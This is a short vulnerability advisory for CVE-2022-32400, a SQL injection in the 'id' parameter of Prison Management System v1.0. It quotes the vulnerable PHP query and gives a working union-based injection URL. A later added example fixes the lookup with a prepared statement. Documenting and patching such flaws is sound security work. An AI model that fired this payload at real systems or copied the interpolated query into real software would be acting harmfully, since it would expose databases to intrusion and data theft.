CVE-2022-32400: BugBounty/cve-2022-32400.md at main · Dyrandy/BugBounty
Prison Management System v1.0 was discovered to contain a SQL injection vulnerability via the ‘id’ parameter at /pms/admin/user/manage_user.php:4.
[+] Vulnerability : SQL Injection
[+] Vulnerability Location : $_GET['id'] in /pms/admin/user/manage_user.php:4
$user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
# Union Based
http://localhost/pms/admin/?page=user/manage_user&id=-1'%20union%20select%201,database(),3,4,5,6,7,8,9,10,11%23
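
A hardened form of the lookup at manage_user.php:4, as an added example that is not part of the original advisory or the project's code. It assumes `$conn` is a `mysqli` connection (the original line calls `$conn->query()`) with the mysqlnd driver available for `get_result()`; the helper name `fetch_user_by_id` is hypothetical.

```php
<?php
// Added example: replacement for the string-interpolated query in manage_user.php.
// Assumption: $conn is a mysqli connection, as suggested by $conn->query() in the original.

/**
 * Fetch one user row by id using a prepared statement.
 * Returns the row as an associative array, or null if the id is invalid or not found.
 */
function fetch_user_by_id(mysqli $conn, $rawId): ?array
{
    // Accept only a positive integer; anything else never reaches the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // The placeholder keeps the request value out of the SQL text entirely,
    // so quotes or keywords in the parameter cannot change the statement.
    $stmt = $conn->prepare('SELECT * FROM users WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed');
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    // fetch_assoc() yields null (or false on older PHP) when no row matches.
    return $row ?: null;
}

// Hypothetical wiring in the page, replacing the original line:
// $user = isset($_GET['id']) ? fetch_user_by_id($conn, $_GET['id']) : null;
```

Integer validation alone would block the request shown above, but the prepared statement is the control that holds if the column type or the validation rule later changes.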